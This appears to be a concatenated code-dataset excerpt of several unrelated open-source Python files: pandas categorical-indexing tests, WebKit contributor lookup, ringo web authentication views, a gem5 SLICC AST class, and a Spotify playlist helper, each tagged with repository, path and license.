assert_frame_equal(cdf.loc[['A', 'B'], :], expect)
exp_columns = CategoricalIndex(list('XY'),
categories=['X', 'Y', 'Z'])
expect = DataFrame(df.loc[:, ['X', 'Y']], index=cdf.index,
columns=exp_columns)
assert_frame_equal(cdf.loc[:, ['X', 'Y']], expect)
# non-unique
df = DataFrame(np.random.randn(3, 3),
index=list('ABA'), columns=list('XYX'))
cdf = df.copy()
cdf.index = CategoricalIndex(df.index)
cdf.columns = CategoricalIndex(df.columns)
exp_index = CategoricalIndex(list('AA'), categories=['A', 'B'])
expect = DataFrame(df.loc['A', :], columns=cdf.columns,
index=exp_index)
assert_frame_equal(cdf.loc['A', :], expect)
exp_columns = CategoricalIndex(list('XX'), categories=['X', 'Y'])
expect = DataFrame(df.loc[:, 'X'], index=cdf.index,
columns=exp_columns)
assert_frame_equal(cdf.loc[:, 'X'], expect)
expect = DataFrame(df.loc[['A', 'B'], :], columns=cdf.columns,
index=CategoricalIndex(list('AAB')))
assert_frame_equal(cdf.loc[['A', 'B'], :], expect)
expect = DataFrame(df.loc[:, ['X', 'Y']], index=cdf.index,
columns=CategoricalIndex(list('XXY')))
assert_frame_equal(cdf.loc[:, ['X', 'Y']], expect)
def test_read_only_source(self):
# GH 10043
rw_array = np.eye(10)
rw_df = DataFrame(rw_array)
ro_array = np.eye(10)
ro_array.setflags(write=False)
ro_df = DataFrame(ro_array)
assert_frame_equal(rw_df.iloc[[1, 2, 3]], ro_df.iloc[[1, 2, 3]])
assert_frame_equal(rw_df.iloc[[1]], ro_df.iloc[[1]])
assert_series_equal(rw_df.iloc[1], ro_df.iloc[1])
assert_frame_equal(rw_df.iloc[1:3], ro_df.iloc[1:3])
assert_frame_equal(rw_df.loc[[1, 2, 3]], ro_df.loc[[1, 2, 3]])
assert_frame_equal(rw_df.loc[[1]], ro_df.loc[[1]])
assert_series_equal(rw_df.loc[1], ro_df.loc[1])
assert_frame_equal(rw_df.loc[1:3], ro_df.loc[1:3])
def test_reindexing(self):
# reindexing
# convert to a regular index
result = self.df2.reindex(['a', 'b', 'e'])
expected = DataFrame({'A': [0, 1, 5, 2, 3, np.nan],
'B': Series(list('aaabbe'))}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(['a', 'b'])
expected = DataFrame({'A': [0, 1, 5, 2, 3],
'B': Series(list('aaabb'))}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(['e'])
expected = DataFrame({'A': [np.nan],
'B': Series(['e'])}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(['d'])
expected = DataFrame({'A': [np.nan],
'B': Series(['d'])}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
# since we are actually reindexing with a Categorical
# then return a Categorical
cats = list('cabe')
result = self.df2.reindex(Categorical(['a', 'd'], categories=cats))
expected = DataFrame({'A': [0, 1, 5, np.nan],
'B': Series(list('aaad')).astype(
'category', categories=cats)}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(Categorical(['a'], categories=cats))
expected = DataFrame({'A': [0, 1, 5],
'B': Series(list('aaa')).astype(
'category', categories=cats)}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(['a', 'b', 'e'])
expected = DataFrame({'A': [0, 1, 5, 2, 3, np.nan],
'B': Series(list('aaabbe'))}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(['a', 'b'])
expected = DataFrame({'A': [0, 1, 5, 2, 3],
'B': Series(list('aaabb'))}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(['e'])
expected = DataFrame({'A': [np.nan],
'B': Series(['e'])}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
# give back the type of categorical that we received
result = self.df2.reindex(Categorical(
['a', 'd'], categories=cats, ordered=True))
expected = DataFrame(
{'A': [0, 1, 5, np.nan],
'B': Series(list('aaad')).astype('category', categories=cats,
ordered=True)}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
result = self.df2.reindex(Categorical(
['a', 'd'], categories=['a', 'd']))
expected = DataFrame({'A': [0, 1, 5, np.nan],
'B': Series(list('aaad')).astype(
'category', categories=['a', 'd'
])}).set_index('B')
assert_frame_equal(result, expected, check_index_type=True)
# passed duplicate indexers are not allowed
pytest.raises(ValueError, lambda: self.df2.reindex(['a', 'a']))
# args NotImplemented ATM
pytest.raises(NotImplementedError,
lambda: self.df2.reindex(['a'], method='ffill'))
pytest.raises(NotImplementedError,
lambda: self.df2.reindex(['a'], level=1))
pytest.raises(NotImplementedError,
lambda: self.df2.reindex(['a'], limit=2))
def test_loc_slice(self):
# slicing
# not implemented ATM
# GH9748
pytest.raises(TypeError, lambda: self.df.loc[1:5])
# result = df.loc[1:5]
# expected = df.iloc[[1,2,3,4]]
# assert_frame_equal(result, expected)
def test_boolean_selection(self):
df3 = self.df3
df4 = self.df4
result = df3[df3.index == 'a']
expected = df3.iloc[[]]
assert_frame_equal(result, expected)
result = df4[df4.index == 'a']
expected = df4.iloc[[]]
assert_frame_equal(result, expected)
result = df3[df3.index == 1]
expected = df3.iloc[[0, 1, 3]]
assert_frame_equal(result, expected)
result = df4[df4.index == 1]
expected = df4.iloc[[0, 1, 3]]
assert_frame_equal(result, expected)
# since we have an ordered categorical
# CategoricalIndex([1, 1, 2, 1, 3, 2],
# categories=[3, 2, 1],
# ordered=True,
# name=u'B')
result = df3[df3.index < 2]
expected = df3.iloc[[4]]
assert_frame_equal(result, expected)
result = df3[df3.index > 1]
expected = df3.iloc[[]]
assert_frame_equal(result, expected)
# unordered
# cannot be compared
# CategoricalIndex([1, 1, 2, 1, 3, 2],
# categories=[3, 2, 1],
# ordered=False,
# name=u'B')
pytest.raises(TypeError, lambda: df4[df4.index < 2])
pytest.raises(TypeError, lambda: df4[df4.index > 1])
def test_indexing_with_category(self):
# https://github.com/pandas-dev/pandas/issues/12564
# consistent result if comparing as Dataframe
cat = DataFrame({'A': ['foo', 'bar', 'baz']})
exp = DataFrame({'A': [True, False, False]})
res = (cat[['A']] == 'foo')
tm.assert_frame_equal(res, exp)
cat['A'] = cat['A'].astype('category')
res = (cat[['A']] == 'foo')
tm.assert_frame_equal(res, exp)
|
bsd-3-clause
|
StevenBlack/phantomjs
|
src/qt/qtwebkit/Tools/Scripts/webkitpy/common/config/committers.py
|
121
|
11526
|
# Copyright (c) 2011, Apple Inc. All rights reserved.
# Copyright (c) 2009, 2011, 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# WebKit's Python module for committer and reviewer validation.
import fnmatch
import json
from webkitpy.common.editdistance import edit_distance
from webkitpy.common.memoized import memoized
from webkitpy.common.system.filesystem import FileSystem
# The list of contributors have been moved to contributors.json
class Contributor(object):
def __init__(self, name, email_or_emails, irc_nickname_or_nicknames=None):
assert(name)
assert(email_or_emails)
self.full_name = name
if isinstance(email_or_emails, str):
self.emails = [email_or_emails]
else:
self.emails = email_or_emails
self.emails = map(lambda email: email.lower(), self.emails) # Emails are case-insensitive.
if isinstance(irc_nickname_or_nicknames, str):
self.irc_nicknames = [irc_nickname_or_nicknames]
else:
self.irc_nicknames = irc_nickname_or_nicknames
self.can_commit = False
self.can_review = False
def bugzilla_email(self):
# FIXME: We're assuming the first email is a valid bugzilla email,
# which might not be right.
return self.emails[0]
def __str__(self):
return unicode(self).encode('utf-8')
def __unicode__(self):
return '"%s" <%s>' % (self.full_name, self.emails[0])
def contains_string(self, search_string):
string = search_string.lower()
if string in self.full_name.lower():
return True
if self.irc_nicknames:
for nickname in self.irc_nicknames:
if string in nickname.lower():
return True
for email in self.emails:
if string in email:
return True
return False
def matches_glob(self, glob_string):
if fnmatch.fnmatch(self.full_name, glob_string):
return True
if self.irc_nicknames:
for nickname in self.irc_nicknames:
if fnmatch.fnmatch(nickname, glob_string):
return True
for email in self.emails:
if fnmatch.fnmatch(email, glob_string):
return True
return False
class Committer(Contributor):
def __init__(self, name, email_or_emails, irc_nickname=None):
Contributor.__init__(self, name, email_or_emails, irc_nickname)
self.can_commit = True
class Reviewer(Committer):
def __init__(self, name, email_or_emails, irc_nickname=None):
Committer.__init__(self, name, email_or_emails, irc_nickname)
self.can_review = True
class CommitterList(object):
# Committers and reviewers are passed in to allow easy testing
def __init__(self,
committers=[],
reviewers=[],
contributors=[]):
# FIXME: These arguments only exist for testing. Clean it up.
if not (committers or reviewers or contributors):
loaded_data = self.load_json()
contributors = loaded_data['Contributors']
committers = loaded_data['Committers']
reviewers = loaded_data['Reviewers']
self._contributors = contributors + committers + reviewers
self._committers = committers + reviewers
self._reviewers = reviewers
self._contributors_by_name = {}
self._accounts_by_email = {}
self._accounts_by_login = {}
@staticmethod
@memoized
def load_json():
filesystem = FileSystem()
json_path = filesystem.join(filesystem.dirname(filesystem.path_to_module('webkitpy.common.config')), 'contributors.json')
contributors = json.loads(filesystem.read_text_file(json_path))
return {
'Contributors': [Contributor(name, data.get('emails'), data.get('nicks')) for name, data in contributors['Contributors'].iteritems()],
'Committers': [Committer(name, data.get('emails'), data.get('nicks')) for name, data in contributors['Committers'].iteritems()],
'Reviewers': [Reviewer(name, data.get('emails'), data.get('nicks')) for name, data in contributors['Reviewers'].iteritems()],
}
def contributors(self):
return self._contributors
def committers(self):
return self._committers
def reviewers(self):
return self._reviewers
def _name_to_contributor_map(self):
if not len(self._contributors_by_name):
for contributor in self._contributors:
assert(contributor.full_name)
assert(contributor.full_name.lower() not in self._contributors_by_name) # We should never have duplicate names.
self._contributors_by_name[contributor.full_name.lower()] = contributor
return self._contributors_by_name
def _email_to_account_map(self):
if not len(self._accounts_by_email):
for account in self._contributors:
for email in account.emails:
assert(email not in self._accounts_by_email) # We should never have duplicate emails.
self._accounts_by_email[email] = account
return self._accounts_by_email
def _login_to_account_map(self):
if not len(self._accounts_by_login):
for account in self._contributors:
if account.emails:
login = account.bugzilla_email()
assert(login not in self._accounts_by_login) # We should never have duplicate emails.
self._accounts_by_login[login] = account
return self._accounts_by_login
def _committer_only(self, record):
if record and not record.can_commit:
return None
return record
def _reviewer_only(self, record):
if record and not record.can_review:
return None
return record
def committer_by_name(self, name):
return self._committer_only(self.contributor_by_name(name))
def contributor_by_irc_nickname(self, irc_nickname):
for contributor in self.contributors():
# FIXME: This should do case-insensitive comparison or assert that all IRC nicknames are in lowercase
if contributor.irc_nicknames and irc_nickname in contributor.irc_nicknames:
return contributor
return None
def contributors_by_search_string(self, string):
glob_matches = filter(lambda contributor: contributor.matches_glob(string), self.contributors())
return glob_matches or filter(lambda contributor: contributor.contains_string(string), self.contributors())
def contributors_by_email_username(self, string):
string = string + '@'
result = []
for contributor in self.contributors():
for email in contributor.emails:
if email.startswith(string):
result.append(contributor)
break
return result
def _contributor_name_shorthands(self, contributor):
if ' ' not in contributor.full_name:
return []
split_fullname = contributor.full_name.split()
first_name = split_fullname[0]
last_name = split_fullname[-1]
return first_name, last_name, first_name + last_name[0], first_name + ' ' + last_name[0]
def _tokenize_contributor_name(self, contributor):
full_name_in_lowercase = contributor.full_name.lower()
tokens = [full_name_in_lowercase] + full_name_in_lowercase.split()
if contributor.irc_nicknames:
return tokens + [nickname.lower() for nickname in contributor.irc_nicknames if len(nickname) > 5]
return tokens
def contributors_by_fuzzy_match(self, string):
string_in_lowercase = string.lower()
# 1. Exact match for fullname, email and irc_nicknames
account = self.contributor_by_name(string_in_lowercase) or self.contributor_by_email(string_in_lowercase) or self.contributor_by_irc_nickname(string_in_lowercase)
if account:
return [account], 0
# 2. Exact match for email username (before @)
accounts = self.contributors_by_email_username(string_in_lowercase)
if accounts and len(accounts) == 1:
return accounts, 0
# 3. Exact match for first name, last name, and first name + initial combinations such as "Dan B" and "Tim H"
accounts = [contributor for contributor in self.contributors() if string in self._contributor_name_shorthands(contributor)]
if accounts and len(accounts) == 1:
return accounts, 0
# 4. Finally, fuzzy-match using edit-distance
string = string_in_lowercase
contributorWithMinDistance = []
minDistance = len(string) / 2 - 1
for contributor in self.contributors():
tokens = self._tokenize_contributor_name(contributor)
editdistances = [edit_distance(token, string) for token in tokens if abs(len(token) - len(string)) <= minDistance]
if not editdistances:
continue
distance = min(editdistances)
if distance == minDistance:
contributorWithMinDistance.append(contributor)
elif distance < minDistance:
contributorWithMinDistance = [contributor]
minDistance = distance
if not len(contributorWithMinDistance):
return [], len(string)
return contributorWithMinDistance, minDistance
def contributor_by_email(self, email):
return self._email_to_account_map().get(email.lower()) if email else None
def contributor_by_name(self, name):
return self._name_to_contributor_map().get(name.lower()) if name else None
def committer_by_email(self, email):
return self._committer_only(self.contributor_by_email(email))
def reviewer_by_email(self, email):
return self._reviewer_only(self.contributor_by_email(email))
|
bsd-3-clause
|
Intevation/ringo
|
ringo/views/auth.py
|
3
|
13434
|
import uuid
import logging
import pyramid.httpexceptions as exc
from pyramid.security import remember, forget
from pyramid.view import view_config
from pyramid.httpexceptions import HTTPFound
from formbar.config import Config, load
from formbar.form import Form, Validator
from ringo.lib.sql import DBSession
from ringo.model.user import USER_GROUP_ID, USER_ROLE_ID
from ringo.lib.helpers import import_model
from ringo.views.users import (
password_minlength_validator,
password_nonletter_validator
)
from ringo.lib.helpers.appinfo import get_app_title
from ringo.lib.helpers.misc import dynamic_import
from ringo.lib.form import get_path_to_form_config
from ringo.lib.security import login as user_login, request_password_reset, \
password_reset, activate_user, encrypt_password, AuthentificationException
from ringo.lib.message import Mailer, Mail
User = import_model('ringo.model.user.User')
Usergroup = import_model('ringo.model.user.Usergroup')
Role = import_model('ringo.model.user.Role')
log = logging.getLogger(__name__)
def is_login_unique(field, data):
"""Validator function as helper for formbar validators"""
users = DBSession.query(User).filter_by(login=data[field]).all()
return len(users) == 0
def is_registration_enabled(settings):
return (bool(settings.get('mail.host')) and
bool(settings.get('mail.default_sender')) and
settings.get('auth.register_user') == "true")
def is_pwreminder_enabled(settings):
return (bool(settings.get('mail.host')) and
bool(settings.get('mail.default_sender')) and
settings.get('auth.password_reminder') == "true")
def is_authcallback_enabled(settings):
return bool(settings.get('auth.callback'))
@view_config(route_name='login', renderer='/auth/login.mako')
def login(request):
_ = request.translate
settings = request.registry.settings
config = Config(load(get_path_to_form_config('auth.xml')))
form_config = config.get_form('loginform')
form = Form(form_config, csrf_token=request.session.get_csrf_token(),
translate=_)
if request.POST:
form.validate(request.params)
username = form.data.get('login')
password = form.data.get('pass')
user = user_login(username, password)
if user is None:
msg = _("Login failed!")
request.session.flash(msg, 'error')
elif not user.activated:
msg = _("Login failed!")
request.session.flash(msg, 'error')
target_url = request.route_path('accountdisabled')
return HTTPFound(location=target_url)
else:
# Handle authentication callback.
if is_authcallback_enabled(settings):
authenticated = False
try:
callback = dynamic_import(settings.get("auth.callback"))
callback(request, user)
authenticated = True
except AuthentificationException as e:
msg = e.message
request.session.flash(msg, 'critical')
else:
authenticated = True
if authenticated:
# Delete old session data and begin with new fresh session.
request.session.invalidate()
msg = _("Login was successfull")
request.session.flash(msg, 'success')
headers = remember(request, user.id)
target_url = request.route_path('home')
return HTTPFound(location=target_url, headers=headers)
return {'form': form.render(),
'registration_enabled': is_registration_enabled(settings),
'pwreminder_enabled': is_pwreminder_enabled(settings)}
@view_config(route_name='logout', renderer='/auth/logout.mako')
def logout(request):
_ = request.translate
target_url = request.route_path('home')
if request.params.get('autologout'):
target_url = request.route_path('autologout')
return HTTPFound(location=target_url)
elif request.user:
log.info("Logout successfull '%s'" % (request.user.login))
msg = _("Logout was successfull")
headers = forget(request)
request.session.flash(msg, 'success')
return HTTPFound(location=target_url, headers=headers)
return HTTPFound(location=target_url)
@view_config(route_name='autologout', renderer='/auth/autologout.mako')
def autologout(request):
# For the first call the user is still authenticated. So
# delete the auth cookie and trigger a redirect calling the same
# page.
if request.user:
headers = forget(request)
target_url = request.route_path('autologout')
if request.user.login != request.registry.settings.get("auth.anonymous_user"):
log.info("Autologout successfull '%s'" % (request.user.login))
return HTTPFound(location=target_url, headers=headers)
# User is not authenticated here anymore. So simply render the
# logout page.
_ = request.translate
return {"_": _}
@view_config(route_name='accountdisabled', renderer='/auth/disabled.mako')
def accountdisabled(request):
_ = request.translate
return {"_": _}
@view_config(route_name='register_user',
renderer='/auth/register_user.mako')
def register_user(request):
settings = request.registry.settings
if not is_registration_enabled(settings):
raise exc.exception_response(503)
_ = request.translate
config = Config(load(get_path_to_form_config('auth.xml')))
form_config = config.get_form('register_user')
form = Form(form_config, csrf_token=request.session.get_csrf_token(),
translate=_)
# Do extra validation which is not handled by formbar.
# Is the login unique?
login_unique_validator = Validator('login',
_('There is already a user with this '
'name'),
is_login_unique)
pw_len_validator = Validator('pass',
_('Password must be at least 12 characters '
'long.'),
password_minlength_validator)
pw_nonchar_validator = Validator('pass',
_('Password must contain at least 2 '
'non-letters.'),
password_nonletter_validator)
form.add_validator(login_unique_validator)
form.add_validator(pw_len_validator)
form.add_validator(pw_nonchar_validator)
registration_complete = False
if request.POST:
if form.validate(request.params):
# 1. Create user. Do not activate him. Default role is user.
ufac = User.get_item_factory()
user = ufac.create(None, form.data)
# Set login from formdata
user.login = form.data['login']
# Encrypt password and save
user.password = encrypt_password(form.data['pass'])
# Deactivate the user. To activate the user needs to confirm
# with the activation link
user.activated = False
atoken = str(uuid.uuid4())
user.activation_token = atoken
# Set profile data
user.profile[0].email = form.data['_email']
# 2. Set user group
gfac = Usergroup.get_item_factory()
default_grps = settings.get("auth.register_user_default_groups",
str(USER_GROUP_ID))
for gid in [int(id) for id in default_grps.split(",")]:
group = gfac.load(gid)
user.groups.append(group)
# 3. Set user role
rfac = Role.get_item_factory()
default_roles = settings.get("auth.register_user_default_roles",
str(USER_ROLE_ID))
for rid in [int(id) for id in default_roles.split(",")]:
role = rfac.load(rid)
user.roles.append(role)
# Set default user group.
request.db.add(user)
# 4. Send confirmation email. The user will be activated
# after the user clicks on the confirmation link
mailer = Mailer(request)
recipient = user.profile[0].email
subject = _('Confirm user registration')
values = {'url': request.route_url('confirm_user', token=atoken),
'app_name': get_app_title(),
'email': settings['mail.default_sender'],
'login': user.login,
'_': _}
mail = Mail([recipient],
subject,
template="register_user",
values=values)
mailer.send(mail)
msg = _("User has been created and a confirmation mail was sent"
" to the users email adress. Please check your email.")
request.session.flash(msg, 'success')
registration_complete = True
return {'form': form.render(), 'complete': registration_complete}
@view_config(route_name='confirm_user',
renderer='/auth/confirm_user.mako')
def confirm_user(request):
settings = request.registry.settings
if not is_registration_enabled(settings):
raise exc.exception_response(503)
_ = request.translate
success = False
token = request.matchdict.get('token')
user = activate_user(token, request.db)
if user:
success = True
msg = _("The user has beed successfull confirmed.")
else:
msg = _("The user was not confirmed. Maybe the confirmation"
" token was not valid or the user is already confirmed?")
return {'msg': msg, 'success': success}
@view_config(route_name='forgot_password',
renderer='/auth/forgot_password.mako')
def forgot_password(request):
settings = request.registry.settings
if not is_pwreminder_enabled(settings):
raise exc.exception_response(503)
_ = request.translate
config = Config(load(get_path_to_form_config('auth.xml')))
form_config = config.get_form('forgot_password')
form = Form(form_config, csrf_token=request.session.get_csrf_token(),
translate=_)
complete = False
msg = None
if request.POST:
if form.validate(request.params):
username = form.data.get('login')
user = request_password_reset(username, request.db)
if user and user.profile[0].email:
recipient = user.profile[0].email
mailer = Mailer(request)
token = user.reset_tokens[-1]
subject = _('Password reset request')
values = {'url': request.route_url('reset_password',
token=token),
'app_name': get_app_title(),
'email': settings['mail.default_sender'],
'username': username,
'_': _}
mail = Mail([recipient],
subject,
template="password_reset_request",
values=values)
mailer.send(mail)
log.info(u"Passwort reset token sent to "
u"user {} with email {}".format(username, recipient))
else:
log.info(u"Failed sending Passwort reset token for {}. "
u"User not found or missing email".format(username))
# Return a message to the user which does not allow to get
# information about the existence of a user.
msg = _("If the user has been found together with configured "
"e-mail, a confirmation mail for resetting the password "
"has been sent. Please check your e-mail box.")
request.session.flash(msg, 'success')
complete = True
return {'form': form.render(), 'complete': complete, 'msg': msg}
@view_config(route_name='reset_password',
renderer='/auth/reset_password.mako')
def reset_password(request):
settings = request.registry.settings
if not is_pwreminder_enabled(settings):
raise exc.exception_response(503)
_ = request.translate
success = False
token = request.matchdict.get('token')
user, password = password_reset(token, request.db)
if password:
mailer = Mailer(request)
recipient = user.profile[0].email
subject = _('Password has been reseted')
values = {'password': password,
'app_name': get_app_title(),
'email': settings['mail.default_sender'],
'_': _}
mail = Mail([recipient],
subject,
template="password_reminder",
values=values)
mailer.send(mail)
msg = _("Password was resetted and sent to the users email address."
" Please check your email.")
success = True
else:
msg = _("Password was not resetted. Maybe the request"
" token was not valid?")
return {'msg': msg, 'success': success}
|
gpl-2.0
|
xiaoyuanW/gem5
|
src/mem/slicc/ast/ActionDeclAST.py
|
60
|
3453
|
# Copyright (c) 1999-2008 Mark D. Hill and David A. Wood
# Copyright (c) 2009 The Hewlett-Packard Development Company
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from slicc.ast.DeclAST import DeclAST
from slicc.symbols import Action, Type, Var
class ActionDeclAST(DeclAST):
def __init__(self, slicc, ident, pairs, statement_list):
super(ActionDeclAST, self).__init__(slicc, pairs)
self.ident = ident
self.statement_list = statement_list
def __repr__(self):
return "[ActionDecl: %r]" % (self.ident)
def generate(self):
resources = {}
machine = self.symtab.state_machine
if machine is None:
self.error("Action declaration not part of a machine.")
if self.statement_list:
# Add new local vars
self.symtab.pushFrame()
addr_type = self.symtab.find("Address", Type)
if addr_type is None:
self.error("Type 'Address' not declared.")
var = Var(self.symtab, "address", self.location, addr_type,
"addr", self.pairs)
self.symtab.newSymbol(var)
if machine.TBEType != None:
var = Var(self.symtab, "tbe", self.location, machine.TBEType,
"m_tbe_ptr", self.pairs)
self.symtab.newSymbol(var)
if machine.EntryType != None:
var = Var(self.symtab, "cache_entry", self.location,
machine.EntryType, "m_cache_entry_ptr", self.pairs)
self.symtab.newSymbol(var)
# Do not allows returns in actions
code = self.slicc.codeFormatter()
self.statement_list.generate(code, None)
self.pairs["c_code"] = str(code)
self.statement_list.findResources(resources)
self.symtab.popFrame()
action = Action(self.symtab, self.ident, resources, self.location,
self.pairs)
machine.addAction(action)
|
bsd-3-clause
|
jcgknudson/spotify-lib
|
common/players/spotify.py
|
1
|
9411
|
#definition for api to create spotify playlist and check if track exists in service
import sys, os
sys.path.insert(0, os.path.abspath('..'))
import math
import logging
import spotipy
import spotipy.util
from spotipy.oauth2 import SpotifyClientCredentials
class SpotifyPlayer(object):
"""
Class for interacting with spotify. Relies on spotipy. Gets a token for a partiuclar
user, and creates spotipy instance from this token for user operations.
Uses client credential flow for getting and searching for track ids.
"""
def __init__(self, spfy_user_id, spfy_app_id='', spfy_app_secret=''):
"""
Constructor for the spotify player class
:param spfy_app_id: id of the client application registered with spotify
:param spfy_app_secret: secret of the client application registered with spotify
:param sofy_user_id: user id who's playlists we want to change
"""
playlist_write_scope = 'playlist-modify-public'
client_credentials_manager = None
auth_spotipy = None
self.user_id=spfy_user_id
#If client id & sceret specified, initialize with the supplied values. Otherwise, assume that they have been
#set as environment variables
if spfy_app_id != '' and spfy_app_secret != '':
client_credentials_manager = SpotifyClientCredentials(spfy_app_id, spfy_app_secret)
auth_spotipy = spotipy.Spotify(auth=spotipy.util.prompt_for_user_token(
spfy_user_id, playlist_write_scope, spfy_app_id, spfy_app_secret))
else:
client_credentials_manager = SpotifyClientCredentials()
auth_spotipy = spotipy.Spotify(auth=spotipy.util.prompt_for_user_token(spfy_user_id, playlist_write_scope))
self.auth_spotipy = auth_spotipy
self.ccm_spotipy = spotipy.Spotify(client_credentials_manager=client_credentials_manager)
def create_playlist(self, playlist_name, description=''):
"""
Creates playlist with the specified name. Description is currently ignored.
"""
logging.debug('creating playlist for user {user}: {playlist} --- {description}'.format(
user=self.user_id, playlist=playlist_name, description=description))
result = None
try:
result = self.auth_spotipy.user_playlist_create(self.user_id, playlist_name)
except:
e = sys.exc_info()[0]
logging.error('error in creating playlist for user {user}: {playlist} --- {description}... error: {error}'.format(
user=self.user_id, playlist=playlist_name, description=description, error=e))
raise
playlist_id = result['id']
logging.debug('created playlist {name} with id {id}'.format(name=playlist_name, id=playlist_id))
return playlist_id
def add_track_ids_to_playlist(self, user_id, playlist_id, track_ids):
"""
Add track ids to specified playlist (spotify can only add 100 at a time)
Adds in batches of batch_size
:param user_id: username of the user who owns the specified playlist
:param playlist_id: playlist to which we're adding tracks
:param track_ids: list of track ids that we're adding to playlist
"""
batch_size = 75
dedeuplicated_track_ids = []
#Try to pre-populate track ids with whatever's already in the playlist
if self.check_playlist_exists(user_id, playlist_id):
dedeuplicated_track_ids = self.get_tracks_in_playlist(user_id, playlist_id)
for i in track_ids:
if i not in dedeuplicated_track_ids:
dedeuplicated_track_ids.append(i)
for i in range(0, math.ceil(len(dedeuplicated_track_ids) / batch_size)):
#get current slize of track ids
max_ind = min(len(dedeuplicated_track_ids), (i+1)*batch_size)
logging.debug('Max_index: {}'.format(max_ind))
track_id_slice = dedeuplicated_track_ids[i*batch_size:max_ind]
logging.info('Attempting to add {} tracks'.format(len(track_id_slice)))
try:
self.auth_spotipy.user_playlist_add_tracks(user_id, playlist_id, track_id_slice)
except:
e = sys.exc_info()[0]
logging.error('error in adding tracks {tracks} to playlist {playlist} for user {user} :{e}'.format(
tracks=track_id_slice, playlist=playlist_id, user=user_id, e=e))
raise
def get_tracks_in_playlist(self, user_id, playlist_id):
track_ids = []
playlist_tracks = self.auth_spotipy.user_playlist_tracks(user_id, playlist_id=playlist_id)
track_ids = [playlist_track['track']['id'] for playlist_track in playlist_tracks['items']]
return track_ids
def add_tracks_to_playlist_by_name(self, user_id, playlist_id, track_info):
"""
Adds a track to the specified playlist id using track_info as a best-guess
:param track_info: A list of dictionaries containing either 'artist' and 'track' keys or a 'blob'
:param playlist_id: spotify's numerical representation of a particular playlist
"""
track_ids = self.get_track_ids_from_track_info(track_info)
self.add_track_ids_to_playlist(user_id, playlist_id, track_ids)
def get_playlist_id_from_name(self, user_id, playlist_name):
"""
:param playlist_name: friendly name of the playlist
:param user_id: user_id whose playlist we want
"""
if user_id == '':
user_id = self.user_id
playlists = []
try:
playlists = self.auth_spotipy.user_playlists(user_id)
except:
e = sys.exc_info()[0]
logging.error('error in getting playlist {playlist_name} for user {user}: {e}'.format(
user=user_id, playlist_name=playlist_name, e=e))
raise
for playlist in playlists['items']:
if playlist['owner']['id'] == user_id and playlist['name'] == playlist_name:
return playlist['id']
logging.warning('no playlist with name {name} found in {user}\'s account'.format(name=playlist_name,user=user_id))
return None
def check_playlist_exists(self, user_id, playlist_name):
"""
:param user_id: spotify user id
:param playlist_name: the friendly name of the playlist we're checking for
"""
playlist_id = self.get_playlist_id_from_name(user_id, playlist_name)
playlists = []
try:
playlists = self.auth_spotipy.user_playlists(user_id)
except:
e = sys.exc_info()[0]
